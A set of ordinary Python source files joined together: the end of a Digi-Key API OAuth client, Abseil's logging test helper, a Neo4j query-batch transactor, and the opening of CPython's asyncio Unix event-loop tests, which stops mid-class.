self.access_token_expiry = int(self.config["tokens"]["access_expiry"])
self.refresh_token_expiry = int(self.config["tokens"]["refresh_expiry"])
def save_tokens(self):
if len(self.config.sections()) == 0: # config file was not present
self.config["tokens"] = {}
self.config["tokens"]["access_token"] = \
"{}".format(self.access_token) # has to store in str
self.config["tokens"]["access_expiry"] = \
"{}".format(self.access_token_expiry)
self.config["tokens"]["refresh_token"] = \
"{}".format(self.refresh_token)
self.config["tokens"]["refresh_expiry"] = \
"{}".format(self.refresh_token_expiry)
# write to file
with open(self.CONFIG_FILENAME, 'w') as f_config:
self.config.write(f_config)
print("Saved auth config")
def authorise(self):
"""
Takes the user through the Digi-Key authorisation process.
:return:
"""
if self.http_thread is None: # server not started
# start the web server to handle the redirected web request after OAuth 2 authorisation completes
self.httpd = socketserver.TCPServer(("127.0.0.1", AUTH_RESP_PORT),
auth_resp_handler_factory(dk_api=self))
# HTTPS code reference: https://gist.github.com/dergachev/7028596
self.httpd.socket = ssl.wrap_socket(self.httpd.socket, certfile="./server.pem", server_side=True)
self.http_thread = threading.Thread(target=self.httpd.serve_forever)
self.http_thread.daemon = True
self.http_thread.start() # run the basic web server in another thread
# start the user browser to begin the authorisation process
webbrowser.open(self.AUTH_URL)
def get_access_token(self, auth_code: str):
"""
Gets the access token from Digi-Key and stores them into the object attributes
:param auth_code: authorisation code for getting the access token
:return: success: bool, True if the operation succeeded
resp: requests.models.response, the full response object in case error occurred
"""
success = False
req_str = "code=" \
"{}&" \
"client_id=" \
"{}&" \
"client_secret=" \
"{}&" \
"redirect_uri=" \
"{}&" \
"grant_type=authorization_code".format(auth_code,
self.CLIENT_ID,
self.CLIENT_SECRET,
self.REDIRECT_URL)
print("Requesting access token...")
access_resp = requests.post(url=self.ACCESS_URL,
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data=req_str)
if access_resp.status_code == 200: # OK
# extract and store tokens
access_resp_json = access_resp.json()
# calculate when the access and refresh tokens will expire
time_now = int(datetime.now().timestamp()) # current time in unix timestamp format
access_expiry = time_now + int(access_resp_json["expires_in"])
refresh_expiry = time_now + int(access_resp_json["refresh_token_expires_in"])
# store tokens
self.access_token = access_resp_json["access_token"]
self.refresh_token = access_resp_json["refresh_token"]
self.access_token_expiry = access_expiry - 10 # offset for some leeway
self.refresh_token_expiry = refresh_expiry - 10
# save into the config file
self.save_tokens()
# update status flag
self.auth_valid = True
self.refresh_valid = True
print("Successfully got the access and refresh tokens:")
print(self.access_token)
success = True
return success, access_resp
def refresh_access_token(self):
success = False
req_str = "client_id=" \
"{}&" \
"client_secret=" \
"{}&" \
"refresh_token=" \
"{}&" \
"grant_type=refresh_token".format(self.CLIENT_ID,
self.CLIENT_SECRET,
self.refresh_token)
print("Requesting refresh token...")
refresh_resp = requests.post(url=self.ACCESS_URL,
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data=req_str)
if refresh_resp.status_code == 200: # OK
# extract and store tokens
refresh_resp_json = refresh_resp.json()
# calculate when the access and refresh tokens will expire
time_now = int(datetime.now().timestamp()) # current time in unix timestamp format
access_expiry = time_now + int(refresh_resp_json["expires_in"])
refresh_expiry = time_now + int(refresh_resp_json["refresh_token_expires_in"])
# store tokens
self.access_token = refresh_resp_json["access_token"]
self.refresh_token = refresh_resp_json["refresh_token"]
self.access_token_expiry = access_expiry - 10 # offset for some leeway
self.refresh_token_expiry = refresh_expiry - 10
print("Successfully got the access and refresh tokens:")
print(self.access_token)
# save into the config file
self.save_tokens()
# update status flag
self.auth_valid = True
self.refresh_valid = True
success = True
return success, refresh_resp
def check_access_token(self):
timestamp_now = int(datetime.now().timestamp())
if timestamp_now > self.refresh_token_expiry: # need to perform another user authorisation
print("Refresh token has expired")
self.refresh_valid = False
else: # refresh token is still valid
self.refresh_valid = True
if timestamp_now > self.access_token_expiry: # access token needs refreshing
print("Access token has expired")
# if the refresh token is expired, the access token will be expired too
self.auth_valid = False
if self.refresh_valid:
success, resp = self.refresh_access_token()
if not success:
print("Failed to refresh the access token! Full response:")
print(resp.json())
else: # successfully refreshed token
print("Successfully refreshed the access token")
self.auth_valid = True
else: # access token is still valid
self.auth_valid = True
def product_2d_barcode(self, dmtx_bytes: bytes):
success = False
self.check_access_token()
encoded_dmtx = urlencode([("", dmtx_bytes)])[1:] # URL encode into an argument pair then trim out the "="
url = "{}{}".format(self.PRODUCT2DBARCODE_URL,
encoded_dmtx)
barcode2d_resp = requests.get(url,
headers={
"accept": "application/json",
"Authorization": "Bearer {}".format(self.access_token),
"X-DIGIKEY-Client-Id": "{}".format(self.CLIENT_ID)
})
if barcode2d_resp.status_code == 200: # OK
success = True
return success, barcode2d_resp
# class factory to link the html handler with the GUI and to pass information around
def auth_resp_handler_factory(dk_api: DKAPIInterface):
class AuthRespHandler(http.server.SimpleHTTPRequestHandler):
"""
This is basically the redirect URI server on localhost
"""
def do_GET(self): # handle the return data from Digi-Key authentication
query = urlparse(self.path).query # query string from the callback URL
auth_results = parse_qs(query, keep_blank_values=True)
resp_html = ""
skip_write_html = False
# check if the auth code is all good
try:
error_message = auth_results["error"]
resp_html = """<p style="text-align: center;"><span style="color: #ff6600;">
<strong>Failed to authorise.</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;">
<strong>Message:
{}
</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;">
<strong>Click <a href="
{}
">here</a> if you would like to try again.</strong></span></p>""".format(
error_message, dk_api.AUTH_URL)
except KeyError: # no error in the response
pass
if resp_html == "": # no error in the response, try get the access and refresh token
try:
auth_code = auth_results["code"][0]
print("Success! Auth code: " + auth_code)
access_success, access_resp = dk_api.get_access_token(auth_code=auth_code)
if access_success: # successfully got the access token
resp_html = """<p style="text-align: center;"><span style="color: #008000;">
<strong>Success!</strong></span></p>
<p style="text-align: center;">You can close this window now.</p>"""
if dk_api.auth_complete_callback is not None:
dk_api.auth_complete_callback()
else:
resp_html = """<p style="text-align: center;"><span style="color: #ff6600;">
<strong>Something went wrong...</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Error code:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Message:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Details:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;">Try again <a href="
{}
">here</a>.</span></p>""".format(access_resp.status_code,
access_resp.json()["ErrorMessage"],
access_resp.json()["ErrorDetails"],
dk_api.AUTH_URL)
print("FAILED:" + str(access_resp.json()))
except KeyError:
skip_write_html = True # not a success request, likely is for favicon
# generate index.html
if not skip_write_html:
with open("index.html", 'w') as f:
f.write(resp_html)
# serve the generated index.html
super().do_GET()
return AuthRespHandler
|
logging_functional_test_helper.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper script for logging_functional_test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging as std_logging
import os
import sys
import threading
import time
import timeit
from absl import app
from absl import flags
from absl import logging
import mock
from six.moves import xrange # pylint: disable=redefined-builtin
FLAGS = flags.FLAGS
class VerboseDel(object):
"""Dummy class to test __del__ running."""
def __init__(self, msg):
self._msg = msg
def __del__(self):
sys.stderr.write(self._msg)
sys.stderr.flush()
def _test_do_logging():
"""Do some log operations."""
logging.vlog(3, 'This line is VLOG level 3')
logging.vlog(2, 'This line is VLOG level 2')
logging.log(2, 'This line is log level 2')
logging.vlog(1, 'This line is VLOG level 1')
logging.log(1, 'This line is log level 1')
logging.debug('This line is DEBUG')
logging.vlog(0, 'This line is VLOG level 0')
logging.log(0, 'This line is log level 0')
logging.info('Interesting Stuff\0')
logging.info('Interesting Stuff with Arguments: %d', 42)
logging.info('%(a)s Stuff with %(b)s',
{'a': 'Interesting', 'b': 'Dictionary'})
with mock.patch.object(timeit, 'default_timer') as mock_timer:
mock_timer.return_value = 0
while timeit.default_timer() < 9:
logging.log_every_n_seconds(logging.INFO, 'This should appear 5 times.',
2)
mock_timer.return_value = mock_timer() + .2
for i in xrange(1, 5):
logging.log_first_n(logging.INFO, 'Info first %d of %d', 2, i, 2)
logging.log_every_n(logging.INFO, 'Info %d (every %d)', 3, i, 3)
logging.vlog(-1, 'This line is VLOG level -1')
logging.log(-1, 'This line is log level -1')
logging.warning('Worrying Stuff')
for i in xrange(1, 5):
logging.log_first_n(logging.WARNING, 'Warn first %d of %d', 2, i, 2)
logging.log_every_n(logging.WARNING, 'Warn %d (every %d)', 3, i, 3)
logging.vlog(-2, 'This line is VLOG level -2')
logging.log(-2, 'This line is log level -2')
try:
raise OSError('Fake Error')
except OSError:
saved_exc_info = sys.exc_info()
logging.exception('An Exception %s')
logging.exception('Once more, %(reason)s', {'reason': 'just because'})
logging.error('Exception 2 %s', exc_info=True)
logging.error('Non-exception', exc_info=False)
try:
sys.exc_clear()
except AttributeError:
# No sys.exc_clear() in Python 3, but this will clear sys.exc_info() too.
pass
logging.error('Exception %s', '3', exc_info=saved_exc_info)
logging.error('No traceback', exc_info=saved_exc_info[:2] + (None,))
logging.error('Alarming Stuff')
for i in xrange(1, 5):
logging.log_first_n(logging.ERROR, 'Error first %d of %d', 2, i, 2)
logging.log_every_n(logging.ERROR, 'Error %d (every %d)', 3, i, 3)
logging.flush()
def _test_fatal_main_thread_only():
"""Test logging.fatal from main thread, no other threads running."""
v = VerboseDel('fatal_main_thread_only main del called\n')
try:
logging.fatal('fatal_main_thread_only message')
finally:
del v
def _test_fatal_with_other_threads():
"""Test logging.fatal from main thread, other threads running."""
lock = threading.Lock()
lock.acquire()
def sleep_forever(lock=lock):
v = VerboseDel('fatal_with_other_threads non-main del called\n')
try:
lock.release()
while True:
time.sleep(10000)
finally:
del v
v = VerboseDel('fatal_with_other_threads main del called\n')
try:
# Start new thread
t = threading.Thread(target=sleep_forever)
t.start()
# Wait for other thread
lock.acquire()
lock.release()
# Die
logging.fatal('fatal_with_other_threads message')
while True:
time.sleep(10000)
finally:
del v
def _test_fatal_non_main_thread():
"""Test logging.fatal from non main thread."""
lock = threading.Lock()
lock.acquire()
def die_soon(lock=lock):
v = VerboseDel('fatal_non_main_thread non-main del called\n')
try:
# Wait for signal from other thread
lock.acquire()
lock.release()
logging.fatal('fatal_non_main_thread message')
while True:
time.sleep(10000)
finally:
del v
v = VerboseDel('fatal_non_main_thread main del called\n')
try:
# Start new thread
t = threading.Thread(target=die_soon)
t.start()
# Signal other thread
lock.release()
# Wait for it to die
while True:
time.sleep(10000)
finally:
del v
def _test_critical_from_non_absl_logger():
"""Test CRITICAL logs from non-absl loggers."""
std_logging.critical('A critical message')
def _test_register_frame_to_skip():
"""Test skipping frames for line number reporting."""
def _getline():
def _getline_inner():
return logging.get_absl_logger().findCaller()[1]
return _getline_inner()
# Check register_frame_to_skip function to see if log frame skipping works.
line1 = _getline()
line2 = _getline()
logging.get_absl_logger().register_frame_to_skip(__file__, '_getline')
line3 = _getline()
# Both should be line number of the _getline_inner() call.
assert (line1 == line2), (line1, line2)
# line3 should be a line number in this function.
assert (line2 != line3), (line2, line3)
def _test_flush():
"""Test flush in various difficult cases."""
# Flush, but one of the logfiles is closed
log_filename = os.path.join(FLAGS.log_dir, 'a_thread_with_logfile.txt')
with open(log_filename, 'w') as log_file:
logging.get_absl_handler().python_handler.stream = log_file
logging.flush()
def _test_stderrthreshold():
"""Tests modifying --stderrthreshold after flag parsing will work."""
def log_things():
logging.debug('FLAGS.stderrthreshold=%s, debug log', FLAGS.stderrthreshold)
logging.info('FLAGS.stderrthreshold=%s, info log', FLAGS.stderrthreshold)
logging.warning('FLAGS.stderrthreshold=%s, warning log',
FLAGS.stderrthreshold)
logging.error('FLAGS.stderrthreshold=%s, error log', FLAGS.stderrthreshold)
FLAGS.stderrthreshold = 'debug'
log_things()
FLAGS.stderrthreshold = 'info'
log_things()
FLAGS.stderrthreshold = 'warning'
log_things()
FLAGS.stderrthreshold = 'error'
log_things()
def _test_std_logging():
"""Tests logs from std logging."""
std_logging.debug('std debug log')
std_logging.info('std info log')
std_logging.warning('std warning log')
std_logging.error('std error log')
def _test_bad_exc_info():
"""Tests when a bad exc_info valud is provided."""
logging.info('Bad exc_info', exc_info=(None, None))
def _test_none_exc_info():
"""Tests when exc_info is requested but not available."""
# Clear exc_info first.
try:
sys.exc_clear()
except AttributeError:
# No sys.exc_clear() in Python 3, but this will clear sys.exc_info() too.
pass
logging.info('None exc_info', exc_info=True)
def _test_unicode():
"""Tests unicode handling."""
test_names = []
def log(name, msg, *args):
"""Logs the message, and ensures the same name is not logged again."""
assert name not in test_names, ('test_unicode expects unique names to work,'
' found existing name {}').format(name)
test_names.append(name)
# Add line seprators so that tests can verify the output for each log
# message.
sys.stderr.write('-- begin {} --\n'.format(name))
logging.info(msg, *args)
sys.stderr.write('-- end {} --\n'.format(name))
log('unicode', u'G\u00eete: Ch\u00e2tonnaye')
log('unicode % unicode', u'G\u00eete: %s', u'Ch\u00e2tonnaye')
log('bytes % bytes', u'G\u00eete: %s'.encode('utf-8'),
u'Ch\u00e2tonnaye'.encode('utf-8'))
log('unicode % bytes', u'G\u00eete: %s', u'Ch\u00e2tonnaye'.encode('utf-8'))
log('bytes % unicode', u'G\u00eete: %s'.encode('utf-8'), u'Ch\u00e2tonnaye')
log('unicode % iso8859-15', u'G\u00eete: %s',
u'Ch\u00e2tonnaye'.encode('iso-8859-15'))
log('str % exception', 'exception: %s', Exception(u'Ch\u00e2tonnaye'))
def main(argv):
del argv # Unused.
test_name = os.environ.get('TEST_NAME', None)
test_fn = globals().get('_test_%s' % test_name)
if test_fn is None:
raise AssertionError('TEST_NAME must be set to a valid value')
# Flush so previous messages are written to file before we switch to a new
# file with use_absl_log_file.
logging.flush()
if os.environ.get('USE_ABSL_LOG_FILE') == '1':
logging.get_absl_handler().use_absl_log_file('absl_log_file', FLAGS.log_dir)
test_fn()
if __name__ == '__main__':
sys.argv[0] = 'py_argv_0'
app.run(main)
|
neo4j_transactor.py
|
"""Neo4j Transacotr"""
import logging
import multiprocessing
import pickle
import time
from neo4j import GraphDatabase
from etl import ETL
from loader_common import ContextInfo
class Neo4jTransactor():
"""Neo4j Transactor"""
logger = logging.getLogger(__name__)
count = 0
queue = None
def __init__(self):
self.thread_pool = []
@staticmethod
def _get_name():
return "Neo4jTransactor %s" % multiprocessing.current_process().name
def start_threads(self, thread_count):
"""Start Threads"""
manager = multiprocessing.Manager()
queue = manager.Queue()
Neo4jTransactor.queue = queue
for i in range(0, thread_count):
process = multiprocessing.Process(target=self.run, name=str(i))
process.start()
self.thread_pool.append(process)
def shutdown(self):
"""Shutdown"""
self.logger.info("Shutting down Neo4jTransactor threads: %s", len(self.thread_pool))
for thread in self.thread_pool:
thread.terminate()
self.logger.info("Finished Shutting down Neo4jTransactor threads")
@staticmethod
def execute_query_batch(query_batch):
"""Execture Query Batch"""
Neo4jTransactor.count = Neo4jTransactor.count + 1
Neo4jTransactor.logger.debug("Adding Query Batch: %s BatchSize: %s QueueSize: %s ",
Neo4jTransactor.count,
len(query_batch),
Neo4jTransactor.queue.qsize())
Neo4jTransactor.queue.put((query_batch, Neo4jTransactor.count))
def check_for_thread_errors(self):
"""Check for Thread Errors"""
ETL.wait_for_threads(self.thread_pool, Neo4jTransactor.queue)
@staticmethod
def wait_for_queues():
"""Wait for Queues"""
Neo4jTransactor.queue.join()
def run(self):
"""Run"""
context_info = ContextInfo()
if context_info.env["USING_PICKLE"] is False:
uri = "bolt://" + context_info.env["NEO4J_HOST"] \
+ ":" + str(context_info.env["NEO4J_PORT"])
graph = GraphDatabase.driver(uri, auth=("neo4j", "neo4j"), max_connection_pool_size=-1)
self.logger.info("%s: Starting Neo4jTransactor Thread Runner: ", self._get_name())
while True:
try:
(query_batch, query_counter) = Neo4jTransactor.queue.get()
except EOFError as error:
self.logger.info("Queue Closed exiting: %s", error)
return
self.logger.debug("%s: Processing query batch: %s BatchSize: %s",
self._get_name(),
query_counter,
len(query_batch))
batch_start = time.time()
total_query_counter = 0
while len(query_batch) > 0:
(neo4j_query, filename) = query_batch.pop(0)
self.logger.debug("%s: Processing query for file: %s QueryNum: %s QueueSize: %s",
self._get_name(),
filename,
query_counter,
Neo4jTransactor.queue.qsize())
start = time.time()
try:
if context_info.env["USING_PICKLE"] is True:
# Save VIA pickle rather then NEO
file_name = "tmp/temp/transaction_%s_%s" \
% (query_counter, total_query_counter)
with open(file_name, 'wb') as file:
self.logger.debug("Writting to file: tmp/temp/transaction_%s_%s",
query_counter,
total_query_counter)
pickle.dump(neo4j_query, file)
else:
with graph.session() as session:
session.run(neo4j_query)
end = time.time()
elapsed_time = end - start
self.logger.info(\
"%s: Processed query for file: %s QueryNum: %s QueueSize: %s Time: %s",
self._get_name(),
filename,
query_counter,
Neo4jTransactor.queue.qsize(),
time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
except Exception as error:
self.logger.error(error)
#self.logger.error("%s: Query Failed: %s", self._get_name(), neo4j_query)
# TODO Extract and print NODE information from error message.
# Would be helpful for troubleshooting.
self.logger.warning(\
"%s: Query Conflict, putting data back in Queue to run later. %s",
self._get_name(),
filename)
query_batch.insert(0, (neo4j_query, filename))
time.sleep(12)
Neo4jTransactor.queue.put((query_batch, query_counter))
break
total_query_counter = total_query_counter + 1
batch_end = time.time()
batch_elapsed_time = batch_end - batch_start
self.logger.debug("%s: Query Batch finished: %s BatchSize: %s Time: %s",
self._get_name(),
query_counter,
len(query_batch),
time.strftime("%H:%M:%S", time.gmtime(batch_elapsed_time)))
Neo4jTransactor.queue.task_done()
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import base_events
from asyncio import events
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
